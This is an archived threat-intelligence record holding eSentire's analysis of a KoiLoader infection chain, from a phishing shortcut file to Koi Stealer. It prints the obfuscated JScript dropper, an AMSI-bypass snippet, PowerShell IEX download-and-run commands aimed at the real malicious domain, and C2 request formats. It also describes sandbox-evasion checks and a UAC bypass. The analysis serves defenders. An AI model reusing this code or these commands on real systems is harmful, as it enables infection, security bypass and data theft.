{
	"id": "07f3fbd2-457b-4926-af33-8a23e2b73545",
	"created_at": "2026-04-06T01:29:46.37483Z",
	"updated_at": "2026-04-10T03:35:21.407381Z",
	"deleted_at": null,
	"sha1_hash": "8f9fee342c91c7ecbf623ccb90b9702637ba5618",
	"title": "The Long and Short(cut) of It: KoiLoader Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1467451,
	"plain_text": "The Long and Short(cut) of It: KoiLoader Analysis\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-06 01:15:26 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nIn March 2025, the eSentire Threat Response Unit (TRU) detected an intrusion attempt involving the use of a\r\nshortcut file leading to the loading of a new version of KoiLoader, a malware loader that facilitates Command and\r\nControl (CnC), and downloads/executes Koi Stealer, an information stealer written in C# with advanced\r\ninformation stealing capabilities.\r\nInfection Chain\r\nThe infection chain can be seen in the figure below.\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 1 of 20\n\nFigure 1 – Infection chain\r\nInitial Access\r\nInitial access is achieved through a spam email and link to a zip file, “chase_statement_march.zip”, similarly to\r\nour prior report. Within the zip file, the victim clicks a shortcut file named “chase_statement_march.lnk”, which\r\nserves to download and execute KoiLoader. This shortcut file makes use of a well-known, low-severity bug in\r\nWindows to effectively conceal the command line arguments when viewing the file's properties.\r\nAs seen in the figure below, the “Target” field is truncated and the remaining contents of the malicious command\r\nare unable to be viewed.\r\nFigure 2 – Shortcut file using ZDI-CAN-25373\r\nThe full contents of the malicious command can be seen below. First, two JScript files are downloaded to\r\nC:\\ProgramData\\g1siy9wuiiyxnk.js and C:\\ProgramData\\i7z1x5npc.js. Next, a scheduled task is created using the\r\nLOLBin “schtasks.exe” to run the JScript file g1siy9wuiiyxnk.js.\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 2 of 20\n\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command $pdw = $env:programdata + '\\' + ('g1siy9wuii\r\nFigure 3 – Malicious command from lnk file\r\nThe contents of g1siy9wuiiyxnk.js can be seen below. The purpose of the script is to delete the scheduled task\r\ncreated before and run a new instance of wscript to execute i7z1x5npc.js.\r\nIt is highly likely that this technique is being used to evade detection, as the parent process of wscript.exe is\r\nusually explorer.exe in attacks involving the user double clicking a script file, whereas using this technique, the\r\nparent process is svchost.exe, giving the impression that WScript was launched by a more trustworthy parent\r\nprocess chain.\r\nvar dol3 = new ActiveXObject(\"WScript.Shell\")\r\ndol3.Run(\"powershell -command \\\"schtasks /delete /tn \" + WScript.arguments(0) + \" /f; wscript $env:programdata\\\\\r\nFigure 4 – Contents of g1siy9wuiiyxnk.js\r\nThe contents of the script i7z1x5npc.js can be seen below, which performs the following actions:\r\n1. Acquires the victim machine’s unique identifier GUID via the registry key\r\n“HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid”.\r\n2. Copy the current script (i7z1x5npc.js) to C:\\ProgramData\\“r” + \u003cGUID\u003e + “r”.js.\r\n3. Send two GET requests to download two PowerShell scripts delivered via the URLS\r\n“https://casettalecese[.]it/wp-content/uploads/2022/10/boomier10qD0.php” and\r\nhttps://casettalecese[.]it/wp-content/uploads/2022/10/nephralgiaMsy.ps1. The responses are then evaluated\r\nas code via Invoke-Expression (IEX).\r\nvar f1=\"Scr\",f2=\"ing.Fi\",f3=\"stemOb\"\r\nvar fso = new ActiveXObject(f1+\"ipt\"+f2+\"leSy\"+f3+\"ject\")\r\nvar w1=\"WSc\",w2=\"riPt\",w4=\"eLl\"\r\nvar wsh=w1+w2+\".sH\"+w4\r\nvar bbj=new ActiveXObject(wsh)\r\nvar fldr=GetObject(\"winmgmts:root\\\\cimv2:Win32_Processor='cpu0'\").AddressWidth==64?\"SysWOW64\":\"System32\"\r\nvar rd=bbj.ExpandEnvironmentStrings(\"%SYSTEMROOT%\")+\"\\\\\"+fldr+\"\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\r\nvar agn='r'+bbj.RegRead('HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\MachineGuid')+'r.js'\r\nif (WScript.ScriptName != agn) {\r\nvar fs5=\"yFi\"\r\ntry {\r\nfso[\"Cop\"+fs5+\"le\"](WScript.ScriptFullName, bbj.ExpandEnvironmentStrings(\"%programdata%\")+\"\\\\\"+agn)\r\n} catch (e) {}\r\n}\r\nvar mtx_name=\"7zAVOXWBV1U0\"\r\nvar mtx_file = bbj.ExpandEnvironmentStrings(\"%tem\"+\"p%\")+\"\\\\\"+mtx_name\r\nvar fs1=\"leteFi\"\r\nvar fs2=\"leExis\"\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 3 of 20\n\ntry {\r\nfso[\"De\"+fs1+\"le\"](mtx_file)\r\n} catch (e) {}\r\nif (!fso[\"Fi\"+fs2+\"ts\"](mtx_file))\r\n{\r\nbbj.Run(rd+\" -command \\\"$typs=[Ref].Assembly.GetTypes();$bss = 'https://casettalecese[.]it/wp-content/uploads/20\r\nFigure 5 – Contents of i7z1x5npc.js\r\nThe purpose of the first PowerShell script (boomier10qD0.php) is to disable Anti-Malware-Scan-Interface\r\n(AMSI).\r\n$vl1 = (\"L8Ek1EOLdflxxTT2W20qMJ0EsGk12dZO5jxvxTT2W20qMJ0EMRc4Ar2q6SDDxTT2W20qMJ0EVEWXewxquV3axTT2W20qMJ0Eybr4Br\r\n$v2=$c.GetFields(\"NonPublic,Static\")\r\nForeach($v3 in $v2) {if ($v3.Name -like \"*am*ed\") {$v3.SetValue($null, $vl1)}}\r\nFigure 6 – Contents of PowerShell returned via boomier10qD0.php\r\nThe purpose of the second PowerShell script (nephralgiaMsy.ps1) is to download the KoiLoader payload,\r\nallocate/write shellcode, allocate/write the KoiLoader payload, and execute the shellcode via CreateThread API\r\ncall, leading to the execution of the KoiLoader payload.\r\nFigure 7 – Contents of nephralgiaMsy.ps1\r\nKoiLoader Stage 1\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 4 of 20\n\nThe first stage of KoiLoader serves to unpack and execute the next stage. This process can be automated by using\r\nour KoiLoader extraction script available here. The unpacking routine makes use of a hashing algorithm to resolve\r\nthe Windows APIs: FindResourceW, LoadResource, and SizeofResource.\r\nIt then calls these APIs to acquire two resources within the PE file that store the next stage encrypted payload and\r\nan XOR key. The payload is then written to memory, marked executable, and the OEP is called.\r\nFigure 8 – Unpacking routine\r\nThe routine responsible for extracting resources from the PE file can be seen below. The routine essentially\r\nresolves the aforementioned APIs and calls them in order to extract the embedded resource within the PE file,\r\nreturning a pointer to the extracted data.\r\nFigure 9 – Resolve APIs via hash, call APIs, and return pointer to resource data\r\nThe routine responsible for resolving APIs via hash can be seen in the figure below. This routine loops over\r\nexported names in Kernel32 and computes a hash for each. If the hash matches the dwHash argument supplied to\r\nthe function, a pointer to the resolved API is returned.\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 5 of 20\n\nFigure 10 – Resolve APIs via hash\r\nThe following python code re-implements the hashing algorithm implemented by the routine denoted in Figure 10\r\nas “fn_compute_hash”. This python code is also available here.\r\ndef fn_compute_hash(api_name):\r\n dwhash = 0x00000000\r\n for i in range(len(api_name)):\r\n dwhash = dwhash \u003c\u003c 4\r\n dwhash = ord(api_name[i]) + dwhash\r\n a = dwhash \u0026 0xF0000000\r\n if a != 0:\r\n x = a \u003e\u003e 0x18\r\n dwhash = dwhash ^ x \u0026 0xFFFFFFFF\r\n a = (~a) \u0026 0xFFFFFFFF\r\n dwhash = dwhash \u0026 a\r\n continue\r\n a = ~a\r\n dwhash = dwhash \u0026 a\r\n return dwhash\r\napi_name = \"FindResourceW\"\r\nhash_val = fn_compute_hash(api_name)\r\nprint(f\"The hash value for {api_name} is {hex(hash_val)}\")\r\n# The hash value for FindResourceW is 0x5681127\r\napi_name = \"LoadResource\"\r\nhash_val = fn_compute_hash(api_name)\r\nprint(f\"The hash value for {api_name} is {hex(hash_val)}\")\r\n# The hash value for LoadResource is 0x9b3b115\r\napi_name = \"SizeofResource\"\r\nhash_val = fn_compute_hash(api_name)\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 6 of 20\n\nprint(f\"The hash value for {api_name} is {hex(hash_val)}\")\r\n# The hash value for SizeofResource is 0xdaa96b5\r\nFigure 11 – Hashing algorithm in python\r\nThe routine responsible for decrypting the encrypted payload can be seen in the figure below.\r\nFigure 12 – XOR decrypt routine\r\nKoiLoader Stage 2\r\nThis stage contains the main functionality of KoiLoader, beginning with a check to ensure the malware isn’t\r\nrunning on friendly machines.\r\nThis check involves the use of the GetUserDefaultLangID Windows API and compares the return value against\r\nthe following known friendly language identifiers: Russian, Armenian, Azerbaijani (Latin/Cyrillic), Belarusian,\r\nKazakh, Tajik, Turkmen, Uzbek (Latin/Cyrillic), and Ukrainian. If a match is found, the malware exits.\r\nFigure 13 – Language checks, evasion function call\r\nEvasion\r\nThe evasion routine, denoted in the figure above as “fn_evasion” serves to check multiple attributes to identify\r\nvirtual machines, specifically Hyper-V, VMWare, VirtualBox, Parallels, and QEMU, security researcher machines,\r\nand sandboxes. This routine returns TRUE in the event a check passes, and the malware exits.\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 7 of 20\n\n1. Display devices are enumerated via EnumDisplayuDevicesW Windows API and checked against the\r\nfollowing strings:\r\n1. Hyper-V\r\n2. VMWare\r\n3. Parallels Display Manager\r\n4. Red Hat QXL controller\r\nFigure 14 – Display devices check targeting Hyper-V, VMWare, Parallels, and QEMU\r\n2. The user’s Documents folder is checked for the following files.\r\n1. Recently.docx\r\n2. Opened.docx\r\n3. These.docx\r\n4. Are.docx\r\n5. Files.docx\r\n3. The following files related to VirtualBox are checked:\r\n1. C:\\Windows\\System32\\VBoxService.exe\r\n2. C:\\Windows\\System32\\VBoxTray.exe\r\n4. The user's desktop directory is checked for the following files, checking if the files are 4 bytes in size and\r\ncontain the string \"BAIT\".\r\n1. Resource.txt\r\n2. OpenVPN.txt\r\n5. Checks for the file “new songs.txt” in the user’s desktop directory. If the file is found, it checks to ensure\r\nthe file is 0x37 bytes, if so it checks for the string “Jennifer Lopez \u0026 Pitbull - On The Floor\\r\\nBeyonce -\r\nHalo”.\r\n6. Uses the Windows API GetUserNameW to get the username and lstrcmpW/StrStrW to determine if any of\r\nthe following known usernames match:\r\n1. Joe Cage\r\n2. STRAZNJICA.GRUBUTT\r\n3. Paul Jones\r\n4. PJones\r\n5. Harry Johnson\r\n6. WDAGUtilityAccount\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 8 of 20\n\n7. sal.rosenburg\r\n8. d5.vc/g\r\n9. Bruno\r\n7. Uses the API GetComputerNameW and lstrcmpW to determine if the following computer names match:\r\n1. DESKTOP-ET51AJO\r\n2. WILLCARTER-PC\r\n3. FORTI-PC\r\n4. SFTOR-PC\r\n8. Uses the GlobalMemoryStatusEx Windows API to determine if the machine has at least 3050 MB of\r\nphysical memory.\r\n9. Checks the user's username against \"Anna\" and the computer name against \"ANNA-PC\".\r\nFigure 15 – Username, computer name, and memory size checks\r\n10. Next, the user's Documents folder is checked for files matching: .doc, .docx, .xls, .xlsx and 14 characters in\r\nlength (excluding file extension). For matches, the file size is checked to ensure it equals 15. This is\r\npossibly used by the malware author for debugging purposes to ensure the final evasion method is skipped.\r\nFor example, if they are debugging their malware as a process other than powershell.exe, they would create\r\nthese files.\r\n11. The final evasion measure checks to see if the current process is named powershell.exe, if not the malware\r\nexists. This check does not run if the prior check resulted in 21 or more matching files.\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 9 of 20\n\nFigure 16 – Test files/running as powershell.exe check\r\nUAC Bypass via ICMLuaUtil\r\nKoiLoader makes use of a known UAC bypass to create an exclusion in Microsoft Defender via the ICMLuaUtil\r\nElevated COM interface. The exclusion path is the same directory where the persistence script is located\r\n(C:\\ProgramData).\r\nFigure 17 – UAC bypass via ICMLuaUtil\r\nPersistence\r\nPersistence is then setup via scheduled task to run the JScript dropper file from earlier (Figure 5), where the file\r\nname is the result of concatenating “C:\\ProgramData\\r” + \u003cMACHINE_GUID\u003e + “r.js”. The machine GUID is\r\nobtained via the registry key/value “HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid”.\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 10 of 20\n\nFigure 18 – Scheduled task\r\nMutex Generation\r\nThe C:\\ drive’s volume serial number is then acquired via the GetVolumeInformation Windows API and used in\r\ngenerating a GUID to use as a Mutex. The Windows API CreateMutexW is then called to register the mutex,\r\nwhere the return value is checked to ensure the mutex doesn’t already exist. Otherwise, the malware exits ensuring\r\nanother instance of the loader isn’t running in parallel.\r\nFigure 19 – Create mutex based on C:\\ serial number\r\nPython code for generating the mutex can be seen below.\r\n# Volume serial number in hex format, can be acquired via PowerShell command:\r\n# (Get-WmiObject Win32_LogicalDisk | Select-Object VolumeSerialNumber).VolumeSerialNumber\r\nVOLUME_SERIAL_NUMBER = 0x5B23AC1F\r\n# Perform the calculations\r\ndef calculate_guid_parts(volume_serial_number):\r\n v0 = 1219472 * volume_serial_number\r\n data3 = (v0 - 18621) \u0026 0xFFFF\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 11 of 20\n\ndata1 = (1219472 * v0 + 1728536051) \u0026 0xFFFFFFFF\r\n data2 = (-25712 * (data1 \u0026 0xFFFF) - 18621) \u0026 0xFFFF\r\n return data1, data2, data3\r\ndef generate_custom_guid(data1, data2, data3):\r\n guid_string = f\"{data1:08X}-{data2:04X}-{data3:04X}-F3F3-F3F3F3F3F3F3\"\r\n return guid_string\r\nif __name__ == \"__main__\":\r\n data1, data2, data3 = calculate_guid_parts(VOLUME_SERIAL_NUMBER)\r\n mutex = generate_custom_guid(data1, data2, data3)\r\n print(f\"Mutex: {mutex}\")\r\nFigure 20 – Mutex generation via python\r\nDownload/Execute KoiStealer via PowerShell\r\nThe routine responsible for downloading and executing KoiStealer can be seen below, which makes use of\r\nPowerShell to send a web request via IWR (Invoke-WebRequest) module and evaluates the response as\r\nPowerShell code via IEX (Invoke-Expression).\r\nThe routine retrieves sd4.ps1 depending on whether the C# compiler v4.0.30319 (csc.exe) is present, otherwise\r\nsd2.ps1 is retrieved. Both files serve to download and execute KoiStealer.\r\nThe PowerShell command lines used are as follows:\r\n1. powershell.exe -command IEX(IWR –UseBasicParsing “https://casettalecese[.]it/wp-content/uploads/2022/10/sd4.ps1”\r\n2. powershell.exe -command IEX(IWR –UseBasicParsing “https://casettalecese[.]it/wp-content/uploads/2022/10/sd2.ps1”\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 12 of 20\n\nFigure 21 – Download/execute PowerShell that leads to KoiStealer\r\nCommand and Control\r\nKoiLoader uses HTTP POST requests for Command and Control purposes. The initial request to the C2 contains\r\nthe victim machine’s GUID, a build ID unique to the campaign, and an X25519 public key encoded in base64.\r\nThis initial request is denoted with “101” at the beginning of the post request’s body.\r\nPOST http://94.247.42[.]253/pilot.php\r\nHTTP/1.1 Content-Type: application/octet-stream\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHost: 94.247.42.253\r\nContent-Length: 94\r\nProxy-Connection: Keep-Alive\r\nPragma: no-cache\r\nContent-Encoding: binary\r\n101|\u003cGUID\u003e|45LkAGkF|\u003cPUBLIC_KEY_BASE64\u003e\r\nThe next check in request to the C2 contains the victim machine’s GUID, a 16 byte randomly generated string,\r\nand encrypted data containing the victim’s OS major version, minor version, username, computer name, and\r\ndomain.\r\nData is encrypted via computing the X25519 shared secret and using it in XORing each plaintext byte. This\r\nrequest type is denoted with “111” in the post data.\r\nPOST http://94.247.42[.]253/pilot.php HTTP/1.1\r\nContent-Type: application/octet-stream\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 13 of 20\n\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHost: 94.247.42.253\r\nContent-Length: 94\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nContent-Encoding: binary\r\n111|\u003cGUID\u003e|\u003c16_BYTE_XOR_KEY_PART_2\u003e|\u003cENCRYPTED_DATA\u003e\r\nFigure 22 – Collect OS info, domain\r\nThe next requests involve a loop that runs indefinitely to retrieve commands from the C2 server, with a one\r\nsecond wait between requests. This request type is denoted with “102” at the beginning of the post request’s body.\r\nPOST http://94.247.42.253/pilot.php HTTP/1.1\r\nContent-Type: application/octet-stream\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHost: 94.247.42.253\r\nContent-Length: 40\r\nProxy-Connection: Keep-Alive\r\nPragma: no-cache\r\nContent-Encoding: binary\r\n102|\u003cGUID\u003e\r\nThe response returned is then handled by a jump table (switch statement), where each command is represented as\r\na single character. Each of the commands and their associated description can be seen in the following table.\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 14 of 20\n\nCommand Description\r\n0x67 Executes scripts/commands via Command Prompt\r\n0x68 Executes scripts/commands via PowerShell\r\n0x69 Enables system shutdown privilege for the running process and performs the shutdown\r\n0x6A Creates a scheduled task to run agent.js and removes agent.js if present on the host\r\n0x6C Establishes communication with a C2 server\r\n0x6E\r\nPerforms process injection into either explorer.exe or certutil.exe based on the subsystem value\r\n(if the subsystem is Console User Interface, the payload is injected into certutil.exe, if it’s\r\nGraphical User Interface, the payload is injected into explorer.exe) or writes the payload to\r\n%TEMP% folder and directly executes it (the naming convention for the payload is generated\r\nwith PRNG)\r\n0x70\r\nDynamically loads and executes a function from a DLL, in our sample, the export function is\r\n“Release”\r\nIn order to triage C2 activities, we created an emulation script available here. The script generates X25519\r\nprivate/public keys and computes a shared secret for encrypting data sent to the C2 in the registration process and\r\nfeatures the ability to specify a proxy for connecting to KoiLoader C2 and generation of a fake\r\nusername/computer name.\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 15 of 20\n\nFigure 23 – KoiLoaderC2 class usage\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 16 of 20\n\nFigure 24 – KoiLoaderC2 class create private/public key, compute shared secret\r\nWhat did we do?\r\nOur team of 24/7 SOC Cyber Analysts proactively isolated the affected host to contain the infection on the\r\ncustomer’s behalf.\r\nWe communicated what happened with the customer and helped them with remediation efforts.\r\nWhat can you learn from this TRU Positive?\r\nPhishing emails continue to remain a key vector for malware distribution, demonstrating the continuous\r\nthreat of social engineering attacks and the need for ongoing vigilance.\r\nThe utilization of Anti-VM capabilities by malware like KoiLoader and KoiStealer highlights the capability\r\nof modern threats to evade analysis and detection by analysts, researchers, and sandboxes.\r\nRecommendations from the Threat Response Unit (TRU):\r\nDisable wscript.exe via AppLocker GPO or Windows Defender Application Control (WDAC):\r\nC:\\Windows\\System32\\WScript.exe\r\nC:\\Windows\\Syswow64\\WScript.exe\r\n*:\\Windows\\System32\\WScript.exe (* represents wildcard to include other drive letter rather than C\r\ndrive)\r\n*:\\Windows\\SysWOW64\\WScript.exe (* represents wildcard to include other drive letter rather\r\nthan C drive)\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 17 of 20\n\nThe use of obfuscation and sophisticated delivery mechanisms by malware underscores the importance of\r\nimplementing comprehensive detection strategies, including script logging and behavior-based detection\r\nmechanisms, to identify and mitigate threats.\r\nImplementing Phishing and Security Awareness Training (PSAT) programs is crucial to educate employees\r\nabout emerging threats and mitigate the risk of successful social engineering attacks.\r\nUse a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) solution to detect and contain\r\nthreats.\r\nIndicators of Compromise\r\nIndicators of Compromise can be found here.\r\nReferences\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 18 of 20\n\nGET STARTED\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 19 of 20\n\nSource: https://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis"
	],
	"report_names": [
		"the-long-and-shortcut-of-it-koiloader-analysis"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775438986,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8f9fee342c91c7ecbf623ccb90b9702637ba5618.pdf",
		"text": "https://archive.orkl.eu/8f9fee342c91c7ecbf623ccb90b9702637ba5618.txt",
		"img": "https://archive.orkl.eu/8f9fee342c91c7ecbf623ccb90b9702637ba5618.jpg"
	}
}